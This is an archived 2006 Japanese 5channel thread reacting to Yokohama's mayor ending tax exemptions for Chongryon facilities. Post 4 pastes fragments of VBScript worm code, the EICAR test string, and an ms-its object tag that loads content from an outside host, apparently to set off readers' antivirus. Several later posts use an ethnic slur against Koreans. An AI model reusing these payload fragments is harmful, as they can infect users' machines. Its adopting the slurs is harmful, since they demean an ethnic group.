5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【横浜市長】中田市長、総連の税免除廃止「制裁の一環です」

1 :エマニエル坊や(第拾一期次席卒業生)φ ★:2006/07/12(水) 21:09:46.03 ID:???0
◇中田宏横浜市長:総連関連施設の税減免廃止「制裁の一環」

 北朝鮮のミサイル発射に伴い、横浜市の中田宏市長は12日の記者会見で、市内にある在日本朝鮮人
総連合会(朝鮮総連)県本部など関連全10施設について、今年度の固定資産税と都市計画税を減免
しないことを明らかにした。ミサイル発射後に減免を取りやめる自治体は全国で初めてという。

 市によると、朝鮮総連関連施設の税減免は64年に開始、05年度の減免額は計440万円。市は近く、
県本部と支部、分会など10施設に減免不許可通知を送る。中田市長は会見で「ミサイルをわが国に
向けて発射している事実は重たい。国全体で行っている経済制裁の一環」などと述べた。
 また来年度以降については「その時々の状況を見て判断する」と述べた。

 朝鮮総連施設に対する課税を巡っては、福岡高裁が2月、熊本市による減免措置を違法とする判決を
出した。これを受け、総務省は4月、各自治体に減免措置の見直しを通知していた。

ソース:毎日新聞
http://www.mainichi-msn.co.jp/seiji/feature/news/20060713k0000m040064000c.html

2 :Ψ:2006/07/12(水) 21:10:25.95 ID:Q7JvD2Zj0
GJ!GJですよ中田市長!!

3 :Ψ:2006/07/12(水) 21:10:36.41 ID:H1qRLZmn0
ガンバレ!!!

4 :Ψ:2006/07/12(水) 21:10:52.92 ID:sWVllGBe0
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)

5 :Ψ:2006/07/12(水) 21:11:36.86 ID:9Ty10ydf0
おせーんだよ!
かっこつけんなぼけ!

6 :Ψ:2006/07/12(水) 21:13:09.46 ID:x2ZTp4K90
漢をあげたな!
中田市長。よくやった。
他自治体も見習え。

7 :Ψ:2006/07/12(水) 21:15:45.32 ID:vHVKKVgU0
そのまま追い出してくれ

8 :Ψ:2006/07/12(水) 21:16:41.14 ID:WDQYU8eW0
中田市長さすがですね。就任当時から、ずっとご活躍を拝見してますが
良い仕事してますね〜。次期首相と大阪府知事になって頂きたい、心から。

9 :Ψ:2006/07/12(水) 21:18:18.25 ID:/HLXT+AX0
横浜って昔から胸の梳く様なスパっとした判断下すよね

そんなイメージがあるぽ

10 :Ψ:2006/07/12(水) 21:19:45.31 ID:QcMlFkcm0
わたくし横浜市民です、有権者です。市長の仕事っぷりにはいつも注目して
おります。今回も実に実によい仕事っぷりで横浜市民であることを誇りに
おもいます。次期選挙も期待していただいてけっこうですよ。

11 :Ψ:2006/07/12(水) 21:20:08.39 ID:mcrpf5wF0
そもそもこういうミサイルに関係なく朝鮮総連の税金減免がおかしいんだよ。
制裁措置とかなんとかじゃなくて法律の適用としてさっさと処理をするべきで
制裁のための減免廃止では北朝鮮が形だけでもミサイルをやめれば元に戻さないといけないじゃないか。
こういうことは地方自治体のすることじゃない。

むしろこんなことに関係なく今まで減免していたこと自体を責めたい。

12 :Ψ:2006/07/12(水) 21:29:14.91 ID:uNLQKqFj0
生中だし

13 :Ψ:2006/07/12(水) 21:31:12.87 ID:xxPjGOyS0
やるじゃん

14 :Ψ:2006/07/12(水) 21:31:16.80 ID:hY1Dk/t+0
市長GJ
でもカレー発祥は横浜ではなく横須賀だ

15 :Ψ:2006/07/12(水) 21:32:00.69 ID:vY2+vLRA0
このスレを開くとウィルス感染。

陰謀を感じる…。


16 :Ψ:2006/07/12(水) 21:36:01.31 ID:IiZxEcYY0
粛々と制裁すればいい。
日本の個別制裁なんて効果がないと言っていた、
人々よ。
一円のダメージからでもいいから北に具体的な制裁の日本人のメッセージを
伝えるべきだ。
メロンが食えなくなっただけで、「日本が怒った」ことを伝えることも
できる。
制裁汁。できることから制裁汁。



17 :Ψ:2006/07/12(水) 21:43:33.56 ID:GEuMjBAf0
当たり前に、なっただけなんだがな・・・・・・

18 :Ψ:2006/07/12(水) 21:49:16.40 ID:46fdfs0N0
中田市長てさかなクンに似てるよね。

19 :Ψ:2006/07/12(水) 21:49:55.12 ID:fxLcyPYM0
GJ

20 :Ψ:2006/07/12(水) 21:51:30.67 ID:YGla+2ZR0
俺も、制裁ド部隊に志願するぜ

21 : ◆lxiuyer5nk :2006/07/12(水) 21:53:04.43 ID:mJ8Q+vrL0
さすがナカダシ長

22 :Ψ:2006/07/12(水) 21:54:13.05 ID:MLvUnfL00
>>4
お前あちこちに貼り付けてるだろ!
通報しといたからな!

23 :Ψ:2006/07/12(水) 21:56:30.30 ID:+jbxEKmu0
当然だな。

24 :Ψ:2006/07/12(水) 22:07:24.25 ID:kGHEJqHU0
>>18
よしもと水族館オープンの時、
フグの被り物以外じゃ区別つかなかったな。

25 :Ψ:2006/07/12(水) 22:12:49.38 ID:hUV4xBbIO
さすが中だし。俺も嫁に中だし。

26 :Ψ:2006/07/12(水) 22:23:13.15 ID:uD2wgN6k0
いいことやってるが、表現に誤りがあるなあ。
「これは制裁の一環である」
じゃなくて
「今まで異常だった点を少しだけ是正した」
だろ?

27 :Ψ:2006/07/12(水) 22:24:02.93 ID:PmpXgXOn0
こんなにかっこいい市長が日本にいるとは!

ハガー市長の方がかっこいいけど。

28 :Ψ:2006/07/12(水) 22:24:22.31 ID:G0VSIysd0
制裁って何だよ?
何様?

29 :砂糖藍子:2006/07/12(水) 22:25:52.47 ID:9v1wZfnu0
こんなステキな市長に中田氏されたい!!

30 :Ψ:2006/07/12(水) 22:27:47.29 ID:uD2wgN6k0
制裁というのは、たとえば総連が会合を
開いたらそれだけで共謀罪が成り立つ
ってくらいじゃないとねー。

31 :Ψ:2006/07/12(水) 22:27:50.55 ID:MWaXsiOT0
このスレ トロイの木馬 ひっかかるぞ  気をつけろ

まったく誰が仕込んだか バレバレだぞ チョン

32 :Ψ:2006/07/12(水) 22:30:21.81 ID:JnkiQhuF0
熊本市の幸山はまだ裁判続けるつもりか?

33 :Ψ:2006/07/12(水) 23:20:13.81 ID:d0uu4AIc0
チョンふざけんな!
ノートン様がお怒りだ。

34 :Ψ:2006/07/12(水) 23:48:11.67 ID:7maTYqMH0
できれば隣の川崎に来て欲しい。
チョン街がかなりあるから。

7 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)